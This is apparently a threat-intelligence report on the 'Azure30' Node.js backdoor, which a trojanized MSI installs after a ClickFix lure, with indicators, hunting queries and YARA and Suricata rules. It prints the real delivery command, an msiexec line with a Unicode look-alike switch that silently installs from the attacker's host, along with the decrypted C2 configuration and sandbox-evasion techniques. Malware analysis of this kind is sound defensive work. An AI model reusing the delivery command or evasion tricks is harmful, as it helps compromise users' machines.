Back to Blog
    Threat Intelligence

    “Azure30” Node.js Backdoor Delivered by a Trojanized MSI

    James McMurry and Ivan WikeOctober 9, 202615 min read
    CORVINater threat analysis report CVR-2026-1008-01: "Azure30" Node.js backdoor delivered by a trojanized MSI. TLP:CLEAR, severity high, confidence high.
    Report details
    Report IDCVR-2026-1008-01
    ClassificationTLP:CLEAR — may be distributed without restriction.
    Version / date1.2 · 9 October 2026
    DeliveryClickFix, observed 7 October 2026
    Prepared byJames McMurry and Ivan Wike
    1MC-Labs
    CORVINater threat analysis (CORVIN Specter malware analysis platform)
    SubjectAzure30-3ade35b5.msi — trojanized Windows Installer package delivering a Node.js backdoor
    Sample SHA-256e08a33f5a9a722f05c1fb881ccb48337013a8824444a0fae7adf0e107b5700a0
    Overall assessmentMalicious — high severity, high confidence. Remote-access backdoor with crypto-wallet reconnaissance and operator-delivered payloads, delivered by ClickFix in at least one observed incident (assessed, moderate confidence).

    1 Executive summary

    A Windows Installer package presenting itself as “User Workspace Tools” by “Workspace Apps” installs a remote-access backdoor written in Node.js. The package bundles its own signed Node.js runtime, so the malicious logic is entirely JavaScript — 31 heavily obfuscated modules — which traditional executable-focused tools rarely inspect.

    Once installed, the backdoor hides itself across three AppData folders, profiles the host, and registers with its operators over an unencrypted WebSocket connection to usatraksell[.]net on port 443. It reports the machine’s identity, domain membership, and which of 82 cryptocurrency wallets are present, then waits for instructions. Ten minutes after first run it installs logon persistence through the user’s Startup folder.

    The operators can open a live PowerShell or cmd shell, browse and steal files, take screenshots, download and run further malware, silently install other MSI packages, and execute arbitrary JavaScript. Every time it connects, the agent also downloads and runs an operator-supplied script from the C2 server — the stage that would perform the actual theft is therefore not present in the installer and can change at any time.

    Delivery. In an intrusion observed on 7 October 2026, a ClickFix lure persuaded a Windows user to paste an msiexec command into the Run dialog, which silently installed an MSI from usaclodconfig[.]net. CORVINater assesses that the package was likely this backdoor or a sibling build (section 2). Resetting credentials does not remove the implant; the device itself must be investigated.

    BOTTOM LINE

    Treat any host that ran this installer as fully compromised by a human operator. Isolate it, move any cryptocurrency funds from a clean device, and rotate credentials stored in its browsers.

    Block usatraksell[.]net, shift-api-control[.]com, dibardo[.]net, and the delivery host usaclodconfig[.]net (23.94.145[.]92). Hunt for node.exe running from %APPDATA%\JadeLilac\Lilac\ and VBS files in Startup folders that launch AppData scripts.

    Key findings

    #Finding
    1Delivery: per-user MSI (no UAC prompt) with a WiX quiet-exec custom action that runs node.exe launch.js --setup --start in a hidden window.
    2Evasion: obfuscator.io string-array obfuscation; randomized file and folder names derived from a build seed; files scattered across %APPDATA% and %LOCALAPPDATA%; install folder emptied after first run; persistence delayed 10 minutes.
    3C2: ws://usatraksell[.]net:443 — WebSocket without TLS on port 443, token f84ee2ce545c4a96a1ffa89fae89c0c0. Code supports a blockchain dead-drop resolver (smart-contract eth_call) to relocate C2 without a new build.
    4Capabilities: 15 operator commands including interactive shell, file theft (≤50 MB per file), screenshots, download-and-execute, silent MSI deployment, JavaScript eval, self-update, and self-deletion.
    5Targeting: reconnaissance of 37 desktop and 45 browser-extension crypto wallets across 9 browser families; checks for Microsoft Defender for Endpoint (*sens* processes).
    6Second stage: downloads /api/agent/script from the C2 at every connection (every ~75 s while disconnected) and executes it — the theft payload is served live by the operators.
    7Network visibility: all C2 traffic is cleartext; the token header X-Agent-Token and the WebSocket upgrade make it straightforward to detect on the wire.
    8Initial access: observed ClickFix delivery on 7 October 2026 — msiexec with a Unicode look-alike /package switch, installing silently from usaclodconfig[.]net (section 2).

    Risk rating

    DimensionRatingBasis
    SeverityHighHands-on-keyboard access, data theft, arbitrary code execution, financial targeting.
    ConfidenceHighFull static deobfuscation corroborated by sandbox execution and captured C2 traffic.
    PrevalenceActiveIn the wild: delivered by ClickFix on 7 October 2026; no public reporting on this family was found; one fallback domain is flagged by multiple vendors.
    DetectabilityModerateScript-based and file-less second stage, but cleartext C2 and distinctive host artifacts.

    2 Observed delivery: ClickFix (7 October 2026)

    In an intrusion observed on 7 October 2026 at 22:13 UTC, the Azure30 installer was delivered through ClickFix: a web page shows a fake “verify you are human” check or error message and instructs the visitor to press Win+R and paste a command that the page has already placed on the clipboard. The pasted command used msiexec to silently download and install a Windows Installer package from usaclodconfig[.]net.

    ClickFix delivery in four steps: fake check page, msiexec command pasted into the Run dialog, silent per-user MSI install from usaclodconfig[.]net, and the Azure30 backdoor checking in with usatraksell[.]net.

    2.1 Timeline

    Observed intrusion timeline in UTC from user sign-in on 7 October 2026 to password change on 8 October 2026.

    Figure 2. Observed intrusion timeline (UTC). Identifying details are withheld.

    UTCEvent
    7 Oct 22:10:24The user signs in to Windows on the device, on a home network.
    7 Oct 22:13:26The ClickFix command is pasted into the Run dialog and executed (section 2.2).
    7 Oct 22:13:27Microsoft Defender detects ClickFix activity, a suspicious command in the RunMRU registry key, use of a living-off-the-land binary, and possible initial access from an emerging threat.
    7 Oct 22:16–22:41Defender detects hands-on-keyboard activity and its automatic attack disruption contains the account and the device.
    ≈7 Oct 22:24If the implant ran, its Startup-folder persistence is written about ten minutes after the agent starts.
    8 Oct 01:32Revoked tokens are rejected on the user’s devices: the earlier sessions are no longer usable.
    8 Oct 17:14The account password is changed and refresh tokens are invalidated. This does not remove an implant from the device.

    2.2 Delivery command

    The command pasted into the Run dialog (the URL’s numeric ver value is withheld):

    msiexec /PᵃᶜkAᵍe "http://usaclodconfig[.]net\lnegraverif.php?ver=<id>" -Q
    • /PᵃᶜkAᵍe is the /package switch written with Unicode modifier letters (ᵃ, ᶜ, ᵍ) so that exact-string detections for msiexec /package do not match; Windows still accepts it.
    • -Q makes the install fully silent. Because the Azure30 package installs per user, no elevation prompt appears and nothing is shown on screen.
    • The package is served from a PHP endpoint with a numeric parameter, which lets the operators rotate builds, and possibly track victims, per request.
    • Windows records the pasted command in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), a durable forensic artifact of ClickFix execution.

    2.3 Delivery infrastructure

    IndicatorDetail
    usaclodconfig[.]netDelivery host for the MSI
    23.94.145[.]92Address of usaclodconfig[.]net at the time of the intrusion; Dedik Services Limited (hosting provider)
    /lnegraverif.php?ver=<id>Download path; the parameter selects or tracks the build served

    2.4 Link to the analysed MSI

    EvidenceAssessment
    Delivery method: msiexec /package <URL> -Q silently installs a remote MSI.The Azure30 MSI is built for exactly this: per-user, no UI, no elevation, payload started by its own install action.
    Timing: the Azure30 MSI was built on 7 October 2026 at 10:56; the ClickFix ran at 22:13 UTC the same day.Consistent with a fresh build pushed to the delivery server for this campaign.
    Infrastructure naming: delivery usaclodconfig[.]net; Azure30 C2 usatraksell[.]net.Same “usa” + word naming style.
    The MSI contains no reference to the delivery URL.Expected: a package does not record where it was downloaded from; its C2 is in the encrypted configuration.

    Assessment: likely (moderate confidence) that this ClickFix delivery served the Azure30 backdoor or a sibling build. Folder names, C2, and token are generated per build, so a copy served at another time may differ from the analysed sample.

    2.5 Implications for responders

    • Credential resets do not remove the implant. The agent runs in the user’s Windows session and talks directly to its own C2; it does not use cloud identity tokens. Password changes and session revocation are necessary but not sufficient.
    • Identity sign-in logs will not show its use. The operators work from the infected device itself, so an absence of suspicious sign-ins elsewhere does not mean the implant is inactive.
    • Network isolation pauses, but does not remove, the implant. Isolation blocks traffic but does not necessarily stop the process. The agent writes its Startup-folder persistence ten minutes after it starts, so it is likely to be on disk and will reconnect when isolation ends or at the next logon.
    • Whether the payload ran is answerable from endpoint telemetry. The installer and agent leave distinctive process, file, and network traces; use the queries below and the indicators in section 12.

    2.6 Hunting queries for ClickFix delivery

    Microsoft Defender XDR advanced-hunting templates. Set the start time and, to scope to one device, the device name:

    let start = datetime(2026-10-07 00:00:00);
    // 1. msiexec installing from a URL typed or pasted into the Run dialog
    DeviceRegistryEvents
    | where Timestamp > start and RegistryKey has @"\Explorer\RunMRU"
    | where RegistryValueData has "msiexec" and RegistryValueData has "http"
    | project Timestamp, DeviceName, RegistryValueData
    
    // 2. Connections to the delivery host
    DeviceNetworkEvents
    | where Timestamp > start
    | where RemoteIP == "23.94.145.92" or RemoteUrl has "usaclodconfig"
    | project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl
    
    // 3. The installer starting node.exe, and the agent or VBS launcher
    DeviceProcessEvents
    | where Timestamp > start
    | where (FileName =~ "node.exe" and (InitiatingProcessFileName =~ "msiexec.exe" or FolderPath has @"\AppData\"))
         or (FileName =~ "wscript.exe" and ProcessCommandLine has "//B" and ProcessCommandLine has @"\AppData\Local\")
    | project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName
    
    // 4. Files the implant writes (folder names vary per build)
    DeviceFileEvents
    | where Timestamp > start
    | where FileName in~ ("launch.js", "install-meta.json", "agent-id.txt", "connect-delay-state.json")
         or (FolderPath has @"\Start Menu\Programs\Startup\" and FileName endswith ".vbs")
    | project Timestamp, DeviceName, ActionType, FolderPath, FileName, SHA256
    
    // 5. C2 and public-IP lookups by node.exe
    DeviceNetworkEvents
    | where Timestamp > start
    | where InitiatingProcessFileName =~ "node.exe" and RemoteUrl has_any ("usatraksell", "shift-api-control", "dibardo", "ipify")

    3 Sample overview

    PropertyValue
    File nameAzure30-3ade35b5.msi
    Size57,222,618 bytes (54.6 MB)
    SHA-256e08a33f5a9a722f05c1fb881ccb48337013a8824444a0fae7adf0e107b5700a0
    SHA-1249945a84797252d3f15742a695bdf4a05e2350e
    MD5cf0e8e12b06533929150a2df806a597d
    File typeWindows Installer package (OLE compound file), built with the WiX Toolset
    Product / manufacturerUser Workspace Tools 1.8.0.5986 / Workspace Apps
    Installer language1031 (German) — installer messages are German
    Upgrade code{63FD0DAC-0817-42E9-AC32-EBE5EC1B51B9}
    Install scopePer-user (ALLUSERS=2, MSIINSTALLPERUSER=1) — no elevation prompt
    Install folder%LOCALAPPDATA%\BronzeMauve\Azure30\ (2,297 files, 182 MB)
    Custom actionsCA64_evpgbd (WixQuietExec64) and CA32_5puf5a (WixQuietExec), condition NOT Installed AND NOT REMOVE
    Payload command"[INSTALLFOLDER]runtime\node.exe" "[INSTALLFOLDER]launch.js" --setup --start

    Package contents

    ComponentDescription
    runtime\node.exeNode.js v26.7.0, 103 MB. Appears to be the official OpenJS Foundation build (embedded certificate strings; signature not cryptographically verified here). Legitimate software abused as the interpreter.
    runtime\node_modules\npmStock npm package manager (unused by the malware).
    app\node_modules\ws, node-ptyOpen-source WebSocket client and pseudo-terminal libraries used for the C2 channel and the interactive shell.
    app\src\*.js (31 files)The backdoor. Obfuscated; file names are random colour words (e.g. CrimsonSilverDenim.js).
    launch.js, FlaxVioletMaroon.js, bundleLayout.jsLauncher and “scatter” stage (unobfuscated).
    install-meta.jsonBuild manifest: entry script, task and VBS names, scatter layout, build seed.
    IndigoLime.cfgXOR-encrypted configuration (C2 URL, token, timers).
    agent-version.jsonAgent version 2; feature list includes interactive-shell, wallet-scan-manual, contract-discovery, packed-config, build-polymorph.

    4 Analysis methodology

    The sample was analyzed with the CORVIN Specter platform and manual reverse engineering. No component of the malware was executed outside disposable virtual machines. Delivery details in section 2 come from endpoint telemetry of one observed intrusion.

    Static analysis

    • Windows Installer tables (CustomAction, Property, Directory, File, InstallExecuteSequence) were read with msitools, and the embedded CAB payload was unpacked with original paths.
    • All 31 JavaScript modules were deobfuscated statically: the obfuscator’s string table, rotation routine, and decoder were evaluated in an empty sandbox with no file, network, or process access, and 1,100 encoded strings were substituted back into the code. The result was reviewed line by line (Figure 3).
    • The configuration file was decrypted with the build seed recovered from install-meta.json; the persistence scripts were reconstructed from the malware’s own generator code.
    • Extracted files were scanned with local intelligence (MalwareBazaar, VirusShare, NSRL, ClamAV, YARA Forge). No known-malware match was found :: this build is not in public hash sets.
    Obfuscated JavaScript as shipped beside the same remote-script loader function after deobfuscation.

    Figure 3. Obfuscated code as shipped (left) and the same function after deobfuscation (right): the remote-script loader.

    Dynamic analysis

    The MSI was detonated in a disposable Windows 11 x64 virtual machine (KVM) with Sysmon, process and socket snapshots, packet capture, and a continuous screen recording. The VM was connected to CORVIN’s simulated internet: a sealed network that answers every DNS name and every connection locally and records it, with no route to the real internet, the LAN, or the analysis host. This allowed the backdoor’s C2 registration to be captured in full.

    5 Infection chain

    Infection chain from MSI install through scatter, agent start, C2 check-in, and delayed persistence.

    Figure 4. Infection chain from installer to C2 check-in and delayed persistence.

    • Install. msiexec installs 2,297 files to %LOCALAPPDATA%\BronzeMauve\Azure30\ without elevation. The package’s finishing action, CA64_evpgbd, uses the WiX WixQuietExec64 helper to run the bundled node.exe on launch.js --setup --start with no window.
    • Scatter. launch.js loads FlaxVioletMaroon.js, which moves the runtime, code, and configuration into three new AppData folders, deletes everything else in the install folder, and records the new locations in install-meta.json (section 6).
    • Start. The launcher spawns the agent CrimsonSilverDenim.js as a detached, hidden node.exe and exits within a second, leaving the agent without a living parent process.
    • Single instance. The agent claims the named pipe \\.\pipe\wra-<24 hex> (SHA-256 of the install path) and a .agent-instance.lock file, so only one copy runs.
    • Profile and check in. It reads the MachineGuid and domain membership through PowerShell, looks up its public IP at api.ipify.org, opens the WebSocket to the C2, sends register, and downloads the operator script.
    • Persist. Ten minutes after first run (AUTOSTART_DELAY_MS = 600000) it writes the Startup-folder VBS chain (section 7).

    Observed timeline (run 246669ec)

    Time after launchEvent
    0 smsiexec /i … /qn started in the user’s desktop session.
    ≈16 sWindows Installer reports success (event 1033) — 2,297 files written.
    ≈17 sAgent node.exe running from %APPDATA%\JadeLilac\Lilac\; cmd → powershell reads domain membership and MachineGuid.
    ≈17 sDNS: api.ipify.org, usatraksell.net; first TCP connection to port 443.
    ≈45 sGET http://usatraksell[.]net:443/api/agent/script with X-Agent-Token, repeated every 75 s.
    ≈60 sWebSocket session opened; register and heartbeat messages sent (Figure 11). Six sessions in total during the run.
    +10 minPersistence written (not reached in the 7-minute window; derived from code).

    6 Installation and file-system footprint

    AppData folders written by the installer and the scatter stage.

    Figure 5. Folders written by the installer and the scatter stage.

    Folder names are not fixed: they are chosen at build time and stored in install-meta.json. In this build the manifest, rewritten after the scatter step, reads:

    {
      "folderName": "Azure30",
      "taskName": "Azure30Note",
      "entryScript": "CrimsonSilverDenim.js",
      "configStore": "IndigoLime.cfg",
      "launcherVbs": "EcruGarnet.vbs",
      "startupVbs": "AzureCopper.vbs",
      "buildSeed": "0f463b62c2",
      "autostart": true,
      "scatter": {
        "paths": {
          "anchor": "C:\\Users\\analyst\\AppData\\Local\\BronzeMauve\\Azure30",
          "runtime": "C:\\Users\\analyst\\AppData\\Roaming\\JadeLilac\\Lilac",
          "app": "C:\\Users\\analyst\\AppData\\Roaming\\KhakiAmber",
          "config": "C:\\Users\\analyst\\AppData\\Roaming\\KhakiAmber",
          "tools": "C:\\Users\\analyst\\AppData\\Local\\Cerulean"
        }
      }
    }

    RESPONDER TIP

    On a suspected host, read %LOCALAPPDATA%\BronzeMauve\Azure30\install-meta.json (or search all user profiles for install-meta.json next to launch.js). Its scatter.paths block lists every folder to collect and clean, whatever names a given build used.

    7 Persistence

    Two-stage VBS persistence chain from the Startup folder to the hidden launcher and node.exe.

    Figure 6. Two-stage VBS persistence written ten minutes after first run.

    Persistence is deliberately delayed by ten minutes, which defeats sandboxes with short observation windows (CORVIN’s own five-minute runs did not reach it). The agent writes two small VBS files:

    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AzureCopper.vbs — runs wscript.exe //B //Nologo on the hidden launcher with window style 0.
    • %LOCALAPPDATA%\Cerulean\EcruGarnet.vbs — checks that node.exe and launch.js exist, then starts them hidden.

    The exact file contents, regenerated from the malware’s own code for this build, are in Appendix B. Variable names inside the scripts are pseudo-random per build, so detections should key on locations and behaviour (wscript //B launching an AppData .vbs from a Startup item), not on content hashes.

    The scheduled-task name Azure30Note appears in the manifest but is only ever deleted (schtasks /Delete) — clean-up from older versions of the tool. The agent also removes legacy launchers such as WinAgent.exe, CaptureScreen.exe, run-agent.cmd, and start-agent.vbs, which indicates a family with several prior releases.

    8 Command and control

    C2 architecture: WebSocket server at usatraksell[.]net, public-IP lookup, and blockchain dead-drop resolver.

    Figure 7. C2 architecture: primary WebSocket server, public-IP lookup, and the blockchain dead-drop resolver.

    Configuration

    IndigoLime.cfg is Base64 text XOR-encrypted with the build seed 0f463b62c2 (key = the seed’s UTF-8 bytes, repeating). Decrypted:

    {
      "token": "f84ee2ce545c4a96a1ffa89fae89c0c0",
      "heartbeatIntervalMs": 720000,
      "reconnectDelayMs": 900000,
      "reconnectBackoffMaxMs": 900000,
      "staleWatchdogMs": 1020000,
      "registerAckTimeoutMs": 30000,
      "staleWatchdogIntervalMs": 60000,
      "panelUrl": "ws://usatraksell.net:443",
      "reportClientIp": true
    }

    Protocol

    DirectionMessageContent
    Agent → C2HTTP Upgrade: websocketGET / to usatraksell[.]net:443 with header X-Agent-Token: f84ee2ce…c0c0. No TLS.
    Agent → C2registerHost profile (Appendix A) plus token, sent immediately on connect.
    C2 → Agentregister_ack, pingAcknowledgement within 30 s or the agent reconnects; pings answered with pong.
    Agent → C2heartbeatHost profile every 12 minutes (heartbeatIntervalMs 720000).
    C2 → Agentcommand{type, payload, requestId} for one of the 15 commands (section 9).
    Agent → C2command_resultResult or error for the request ID.
    Agent → C2wallet_report, av_reportSent after wallet and AV scans.
    C2 → AgentshellInteractive terminal session messages (start, input, resize, close).
    Agent → C2 (HTTP)GET /api/agent/scriptOperator JavaScript, executed via vm.runInNewContext; may add commands and hooks.

    Blockchain dead-drop resolver

    The module CeruleanMaroonRuby.js can obtain the C2 address from an Ethereum-compatible smart contract by calling eth_call with function selectors 0x4ab7874e (primary URL) and 0xd3505b89 (fallback URL) through a configured JSON-RPC endpoint, retrying every 15 minutes. This lets the operators relocate their servers by updating the contract, without shipping a new build. The feature is present but not enabled in this build’s configuration. A table left in SepiaFuchsia.js maps five contract addresses to fallback servers and links this build to earlier ones:

    Contract addressMapped fallback C2
    0xf9099d0d747368cce8c10226cc9af2bfd4ddbfcf4ws://shift-api-control[.]com:3851
    0xc435c1eb474a335b48fbb40745a1c1c9b77d0772ws://dibardo[.]net:3852
    0xe58352492f1605380d1ddef0287ed380b31061fbws://dibardo[.]net:3852
    0x0bd0ba59f5e31cd37637b72b042bd0da09f935b2ws://shift-api-control[.]com:3851
    0xd6a2ba02d52c61bdd355d36d5e16397808a0f2e4ws://shift-api-control[.]com:3851

    Open-source context: shift-api-control[.]com is flagged malicious by 12 of 89 engines on VirusTotal and was first observed on 23 September 2026 (PhishDestroy). No public reporting was found for usatraksell[.]net or dibardo[.]net.

    9 Capabilities

    The 15 backdoor operator commands grouped by purpose.

    Figure 8. The 15 operator commands, grouped by purpose.

    CommandBehaviourHost artifacts
    powershellWrites the command to a temporary script and runs it with -ExecutionPolicy Bypass.%TEMP%\wra-ps-<time>-<rand>.ps1 (deleted)
    cmdRuns a command through cmd.exe; output returned.—
    shellInteractive PowerShell or cmd via node-pty (ConPTY).conhost child of node.exe
    evalRuns JavaScript with access to fs, os, path, Buffer.—
    download_runDownloads a URL and runs it detached and hidden.%TEMP%\agent-dl-<time>-<name>
    deployInstalls an MSI per-user silently, or runs a PS1 or CMD, from a URL or inline content.%TEMP%\winagent-deploy\deploy-<time>.(msi|ps1|cmd)
    fileslist, read (≤5 MB text / ≤50 MB base64), download, write, delete, drives.—
    screenshotCaptures the whole virtual desktop via PowerShell / System.Drawing.%TEMP%\capture-screen-*.ps1, screenshot-*.png (deleted)
    wallet_scanEnumerates crypto wallets (section 10).KhakiAmber\wallet-check-state.json
    av_scanSecurity Center AV products plus processes matching *sens* (Defender for Endpoint).—
    agent_updateReplaces agent code and dependencies from a ZIP, then restarts.%TEMP%\wra-update-*.zip, wra-apply-*.ps1
    reconnectClears cached C2 and reconnects.—
    capabilitiesReports version and features.—
    killRemoves persistence and deletes all its folders.%TEMP%\wa-kill-<time>.cmd
    load_scriptPlaceholder; scripts load on reconnect.—

    10 Crypto-wallet targeting

    Wallet reconnaissance coverage: 37 desktop wallets and 45 browser-extension wallets across 9 browser families.

    Figure 9. Wallet reconnaissance coverage.

    The wallet_scan routine does not itself copy wallet data. It checks %APPDATA% for 37 desktop-wallet folders and walks nine browser profile trees for 45 wallet-extension IDs, then returns the names and full paths to the operators as wallet_report. This lets the operators triage victims by value; theft then follows through the files command (base64 download of up to 50 MB per file), eval, or the operator script.

    IMPACT

    If a victim had any listed wallet installed, assume its seed phrase, keystore, or extension vault may have been exfiltrated. Move funds to a new wallet created on a clean device.

    11 Sandbox evidence

    11.1 Process activity

    Sysmon process tree from the sandbox run showing msiexec, node.exe, cmd, and PowerShell.

    Figure 10. Process tree recorded by Sysmon in run 246669ec.

    11.2 Captured C2 registration

    Captured first WebSocket register message sent by the backdoor to its C2 server.

    Figure 11. First WebSocket message sent to the C2, captured by the CORVIN simulated internet.

    The registration contains the host’s stable identifier (<hostname>-<first 12 hex of MachineGuid>), MachineGuid, user name, domain or workgroup, local IP, memory, CPU count, and uptime. The public IP is added when the api.ipify.org lookup succeeds (reportClientIp: true).

    11.3 What the user sees

    Sandbox VM desktop 20 seconds after launch showing no window, prompt, or error.

    Figure 12. VM desktop 20 seconds after launch, while the backdoor installs and connects: no window, prompt, or error is shown.

    11.4 Sandbox detection and platform improvements

    CORVIN sandbox score before platform fixes (0/100) and after (100/100).

    Figure 13. CORVIN result before and after the platform fixes made during this investigation.

    The first sandbox run scored the sample 0/100. Investigation found three platform gaps, all since corrected in CORVIN:

    • Sysmon log overflow. Sysmon wrote 316,356 records in ten minutes and its circular log overwrote the installation events before collection. The log is now enlarged per run, read throughout the run, and checked for wrapping.
    • Orphaned process. The launcher detaches the agent and exits within a second, which broke process attribution. Process creations are now followed live from Sysmon.
    • No installer inspection. MSI tables and embedded files were not examined. CORVIN now resolves custom-action command lines, flags bundled interpreters, per-user AppData installs, and obfuscated scripts, and scans the unpacked payload.

    The simulated internet also gained full WebSocket support, which is how the registration in Figure 11 was captured.

    12 Indicators of compromise

    Network

    TypeIndicatorContext
    Domainusaclodconfig[.]netClickFix delivery host
    IP23.94.145[.]92usaclodconfig[.]net; Dedik Services Limited
    URLhxxp://usaclodconfig[.]net\lnegraverif.php?ver=<id>MSI download used by the ClickFix command (numeric value withheld)
    Commandmsiexec /PᵃᶜkAᵍe "<URL>" -QClickFix pattern; Unicode look-alike /package switch
    Domainusatraksell[.]netPrimary C2 (configured)
    URLws[:]//usatraksell[.]net:443/WebSocket C2, no TLS
    URLhxxp://usatraksell[.]net:443/api/agent/scriptOperator-script download
    Domainshift-api-control[.]comFallback C2, TCP 3851 (earlier builds)
    Domaindibardo[.]netFallback C2, TCP 3852 (earlier builds)
    URLhxxps://api.ipify[.]org?format=textPublic-IP lookup (legitimate service, context only)
    HTTP headerX-Agent-Token: f84ee2ce545c4a96a1ffa89fae89c0c0Per-campaign agent token
    Contracts0xf9099d0d…bfcf4, 0xc435c1eb…0772, 0xe5835249…61fb, 0x0bd0ba59…35b2, 0xd6a2ba02…f2e4Blockchain dead-drop addresses (full values in section 8)

    Host

    TypeIndicatorContext
    Folder%LOCALAPPDATA%\BronzeMauve\Azure30\Install folder / anchor
    Folder%APPDATA%\JadeLilac\Lilac\Runtime (node.exe)
    Folder%APPDATA%\KhakiAmber\Agent code and config
    Folder%LOCALAPPDATA%\Cerulean\Hidden VBS launcher
    File…\Startup\AzureCopper.vbsLogon persistence
    File%LOCALAPPDATA%\Cerulean\EcruGarnet.vbsHidden launcher
    FileIndigoLime.cfg, agent-id.txt, connect-delay-state.json, wallet-check-state.json, .agent-instance.lockAgent state
    Processnode.exe …\KhakiAmber\app\src\CrimsonSilverDenim.jsAgent command line
    Processnode.exe …\Azure30\launch.js --setup --startLauncher (from msiexec)
    Named pipe\\.\pipe\wra-[0-9a-f]{24}Single-instance lock (e.g. wra-0d5d29675c8113b7cb5e1179)
    Temp fileswra-ps-*.ps1, agent-dl-*, winagent-deploy\, capture-screen-*.ps1, wra-update-*.zip, wra-apply-*.ps1, wa-kill-*.cmdCommand artifacts in %TEMP%
    MSIProduct “User Workspace Tools” / “Workspace Apps”, UpgradeCode {63FD0DAC-0817-42E9-AC32-EBE5EC1B51B9}Installed-programs entry

    Files

    FileSHA-256
    Azure30-3ade35b5.msie08a33f5a9a722f05c1fb881ccb48337013a8824444a0fae7adf0e107b5700a0
    runtime\node.exee921fe5307e29bf6fd00000dd594356affd3a7b044e52720c7f10decbdc305b9
    launch.jse89ed5c2f859a81eeda81880edfcb931e8e69988cea86aa425dcbc55cdf661f9
    FlaxVioletMaroon.jsde54fd3af55c1b95229bdb25791053e172fb0e75c4e214047b0ae3b330926f98
    bundleLayout.js142642785c2bd4ca3baf1691dd1c86938f338daadf9f66ba2030d3076a52c686
    install-meta.json3ee1f0744b66ebdb5d0debeffee9bf8ebbf1301eb196cb1c35a34f6cc2b5b473
    IndigoLime.cfg36c34b602987687457a538d6788113253aaa4e5880a68e0e3df69bed15070252
    agent-version.json93416eb93cebf61de3856d9650cf0f0f1a62c54848399b3d1d989fa6e718324e
    install-meta.json (after scatter)df97bb9b57b254f592650df7d89d5a8e2a7a294d8af54baf3398000f79a6397c

    Hashes of every agent module are listed in Appendix D.

    13 MITRE ATT&CK mapping

    TacticTechniqueEvidence
    Initial accessT1204.004 User Execution: Malicious Copy and PasteClickFix: user pastes the msiexec command into the Run dialog (ClickFix)
    ExecutionT1218.007 System Binary Proxy Execution: Msiexecmsiexec /package <URL> -Q installs the remote MSI; custom action runs the payload
    ExecutionT1059.007 JavaScriptAgent, launcher, eval, operator script
    ExecutionT1059.001 PowerShell / T1059.003 Windows Command ShellHost profiling, powershell/cmd/shell commands
    ExecutionT1059.005 Visual BasicStartup and launcher VBS
    PersistenceT1547.001 Registry Run Keys / Startup FolderAzureCopper.vbs in the Startup folder
    Defense evasionT1027 Obfuscated Files or InformationString-array obfuscation, XOR-encrypted config
    Defense evasionT1564.003 Hidden WindowwindowsHide, wscript //B, window style 0
    Defense evasionT1036 Masquerading“User Workspace Tools”; random colour-word names
    Defense evasionT1070.004 File DeletionInstall folder emptied; kill self-deletion
    DiscoveryT1082 System Information / T1033 System Owner/UserHostname, user, OS, memory, uptime
    DiscoveryT1012 Query RegistryMachineGuid from HKLM\SOFTWARE\Microsoft\Cryptography
    DiscoveryT1016 System Network ConfigurationLocal IP; public IP via ipify
    DiscoveryT1518.001 Security Software DiscoverySecurity Center AV; *sens* processes
    DiscoveryT1083 File and Directory DiscoveryWallet folder and extension enumeration; files list
    CollectionT1005 Data from Local System / T1113 Screen Capturefiles read/download, screenshot
    Command and controlT1071.001 Web ProtocolsWebSocket over HTTP on port 443
    Command and controlT1102.001 Web Service: Dead Drop ResolverSmart-contract C2 lookup
    Command and controlT1105 Ingress Tool Transferdownload_run, deploy, operator script, agent_update
    ExfiltrationT1041 Exfiltration Over C2 ChannelFile contents returned as command results

    14 Detection and hunting

    YARA (validated)

    The following rules were tested against the MSI and its 2,297 unpacked files (5 true positives: the MSI, two agent modules, and the two launcher files) and against 30,165 benign JavaScript files and binaries, including the bundled Node.js runtime, npm, ws, and node-pty, with no false positives.

    /*
       CORVINater — Node.js "win-agent-client" backdoor (Azure30 build)
       Report CVR-2026-1008-01 · TLP:CLEAR
       Tested: matches the MSI dropper and the unpacked agent modules; no matches
       in the bundled Node.js runtime, npm, node-pty, or ws packages.
    */
    rule CORVINater_WinAgent_JS_Core
    {
        meta:
            description = "Node.js win-agent-client backdoor: WebSocket C2 core, command handlers, or remote-script loader"
            author = "CORVINater"
            date = "2026-10-08"
            reference = "CVR-2026-1008-01"
        strings:
            $tok   = "X-Agent-Token" ascii
            $s1    = "wallet_report" ascii
            $s2    = "av_report" ascii
            $s3    = "register_ack" ascii
            $s4    = "/api/agent/script" ascii
            $s5    = "winagent-deploy" ascii
            $s6    = "agent-dl-" ascii
            $s7    = "AGENT_ANCHOR" ascii
            $s8    = "downgradeMistakenWss" ascii
            $s9    = "wra-ps-" ascii
        condition:
            filesize < 200KB and ($tok and 1 of ($s*)) or 3 of ($s*)
    }
    
    rule CORVINater_WinAgent_Scatter_Launcher
    {
        meta:
            description = "win-agent-client launcher / scatter stage (launch.js, scatterLayout module)"
            author = "CORVINater"
            date = "2026-10-08"
            reference = "CVR-2026-1008-01"
        strings:
            $a = "runScatterIfNeeded" ascii
            $b = "resolveLayoutPaths" ascii
            $c = "scatterLayout" ascii
            $d = "AGENT_ANCHOR" ascii
            $e = "connect-delay-state.json" ascii
            $f = "wallet-check-state.json" ascii
        condition:
            filesize < 50KB and 3 of them
    }
    
    rule CORVINater_WinAgent_MSI_Dropper
    {
        meta:
            description = "MSI that runs a bundled node.exe on launch.js --setup --start via a WiX quiet-exec custom action"
            author = "CORVINater"
            date = "2026-10-08"
            reference = "CVR-2026-1008-01"
        strings:
            $ole  = { D0 CF 11 E0 A1 B1 1A E1 }
            $cmd  = "runtime\\node.exe\" \"[INSTALLFOLDER]launch.js\" --setup --start" ascii
            $wix1 = "WixQuietExec64CmdLine" ascii
            $wix2 = "WixQuietExecCmdLine" ascii
        condition:
            $ole at 0 and $cmd and 1 of ($wix*)
    }

    Network detection (template)

    Untested template for Suricata-compatible sensors; adjust variables to your environment.

    alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"CORVINater WinAgent WebSocket C2 registration (X-Agent-Token)"; flow:established,to_server; http.header_names; content:"X-Agent-Token"; nocase; http.header; content:"websocket"; nocase; classtype:trojan-activity; sid:9260101; rev:1;)
